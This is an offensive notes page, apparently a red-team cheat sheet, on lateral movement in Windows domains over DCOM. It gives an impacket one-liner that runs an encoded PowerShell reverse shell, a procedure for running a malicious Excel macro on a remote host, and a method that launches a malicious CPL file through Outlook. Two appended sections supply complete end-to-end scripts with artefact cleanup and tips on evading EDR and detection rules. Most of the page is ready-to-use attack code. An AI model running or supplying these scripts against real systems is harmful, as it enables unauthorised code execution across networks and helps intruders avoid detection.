DCOM Lateral Movement

05.06.2024 · dadevel

Lateral Movement over DCOM.

Execute a reverse shell.

impacket-dcomexec -k -no-pass -nooutput srv01.corp.com "powershell.exe -ep bypass -e $(iconv -t utf16le ./shell.ps1 | base64 -w0)"

OpSec: By default dcomexec runs the command through cmd.exe with its output redirected to a file on the target (in the ADMIN$ share), which is then read back over SMB. Both the cmd.exe spawn and the SMB file access are visible to EDR; pass -nooutput to skip the output file when you only need the reverse shell.

Untested tools:

  • DLHell, Python script for DCOM DLL proxying
  • CheeseDcom, implements many different methods in C#



Check that Excel.Application can be activated on the target. The second argument is the target host; remote activation requires local admin on it and TCP 135 plus the dynamic RPC ports reachable through its firewall.

$com = [activator]::CreateInstance([type]::GetTypeFromProgId('Excel.Application', 'srv01.corp.com'))
$com | Get-Member

Create a new Excel document. Select View/Macros, name the macro mymacro and insert the following VBA stub, placing the payload inside its body.

Sub mymacro()
    ' payload goes here
End Sub

Then save the sheet in the legacy *.xls format (the default *.xlsx format cannot carry macros).

Copy the document to the target over SMB (C$ requires local admin).

cp ./evil.xls \\srv01.corp.com\c$\evil.xls

When Excel is started through DCOM it runs with the system profile rather than an interactive user's, and it aborts if the Desktop folder is missing from that profile. Create it before opening the workbook; the path is SysWOW64 for 32-bit Office on 64-bit Windows and System32 for 64-bit Office.

mkdir \\srv01.corp.com\c$\Windows\SysWOW64\config\systemprofile\Desktop

Open the workbook and run the macro by name. Opening alone does not execute mymacro; only an Auto_Open or Workbook_Open macro would run automatically.

$workbook = $com.Workbooks.Open('C:\evil.xls')
$com.Run('mymacro')
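The whole Excel.Application procedure above as one script. This is an added example, not code from the original page; it assumes an elevated PowerShell on the attacking Windows host holding a session with local admin on srv01.corp.com, evil.xls (containing Sub mymacro) in the current directory, and DCOM reachable on the target.

```powershell
# Added example: Excel.Application over DCOM, end to end.
# Assumptions: local admin on $target, .\evil.xls with Sub mymacro, DCOM reachable.
$target = 'srv01.corp.com'

# 1. Check that Excel.Application is registered and activatable on the target.
#    GetTypeFromProgId returns $null (rather than throwing) when the ProgId is unknown.
$type = [type]::GetTypeFromProgId('Excel.Application', $target)
if (-not $type) { throw "Excel.Application is not registered on $target" }
$com = [Activator]::CreateInstance($type)
$com | Get-Member -MemberType Method | Select-Object -First 5   # proxy works if members list

# 2. Stage the workbook over SMB (C$ requires local admin).
Copy-Item -Path .\evil.xls -Destination "\\$target\c$\evil.xls"

# 3. Excel launched via DCOM uses the system profile and aborts when its Desktop
#    folder is missing. Create both variants so 32-bit and 64-bit Office are covered.
foreach ($arch in 'System32', 'SysWOW64') {
    $desktop = "\\$target\c$\Windows\$arch\config\systemprofile\Desktop"
    if (-not (Test-Path $desktop)) {
        New-Item -ItemType Directory -Path $desktop | Out-Null
    }
}

# 4. Open the workbook and run the macro by name; DisplayAlerts off avoids
#    a blocking dialog (e.g. compatibility prompts) on a host nobody is watching.
$com.DisplayAlerts = $false
$workbook = $com.Workbooks.Open('C:\evil.xls')
$com.Run('mymacro')

# 5. Clean up: close without saving, quit Excel, release the proxy, remove the file.
$workbook.Close($false)
$com.Quit()
[void][Runtime.InteropServices.Marshal]::ReleaseComObject($com)
Remove-Item -Path "\\$target\c$\evil.xls"
```

Creating both systemprofile Desktop folders is deliberate: you usually do not know the Office bitness in advance, and an empty extra directory is cheaper than a second round trip after Excel fails to start. The cleanup step matters for OpSec as well as hygiene, since an orphaned EXCEL.EXE under the system profile is an obvious artefact.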

Outlook.Application + CPL file

Some DCOM classes cannot be activated remotely at all, Shell.Application among them. Outlook.Application exposes a CreateObject method that instantiates any registered COM class inside the remote Outlook process and returns a proxy to it, so Outlook can be used as an in-process factory to reach those classes.

Load CPL file via DCOM.

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("0006F033-0000-0000-C000-000000000046", "ws01.corp.com"))
$b = $a.CreateObject("Shell.Application")
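Carrying the Outlook proxy through to launching the CPL file, as an added example that is not part of the original page. It assumes local admin on ws01.corp.com, Outlook installed there, and evil.cpl already staged at C:\evil.cpl (copied over the C$ share the same way as the workbook above); the launch via control.exe and the ShellExecute argument values are choices of this example.

```powershell
# Added example: Outlook.Application as a proxy for Shell.Application, then
# launching a Control Panel applet with it.
# Assumptions: local admin on $target, Outlook installed, C:\evil.cpl staged.
$target = 'ws01.corp.com'
$outlookClsid = [guid]'0006F033-0000-0000-C000-000000000046'   # Outlook.Application

# Remote activation of Outlook.Application by CLSID on the target.
$outlook = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID($outlookClsid, $target))

# Outlook.Application.CreateObject builds the class inside the remote Outlook
# process, which is why Shell.Application is reachable here but not directly.
$shell = $outlook.CreateObject('Shell.Application')

# A .cpl is a DLL exporting CPlApplet; control.exe loads it and calls into it.
# ShellExecute(File, Arguments, Directory, Operation, Show); Show = 0 hides the window.
$shell.ShellExecute('control.exe', 'C:\evil.cpl', 'C:\Windows\System32', 'open', 0)

# Clean up: release the proxies and close the remote Outlook instance.
[void][Runtime.InteropServices.Marshal]::ReleaseComObject($shell)
$outlook.Quit()
[void][Runtime.InteropServices.Marshal]::ReleaseComObject($outlook)
```

The interesting property is that the process tree on the target shows OUTLOOK.EXE spawning control.exe, not a remote PowerShell or cmd.exe, which is what a detection keyed on the usual DCOM launchers (mmc.exe, explorer.exe children) would miss; defenders should treat Outlook starting control.exe or rundll32.exe as just as suspicious.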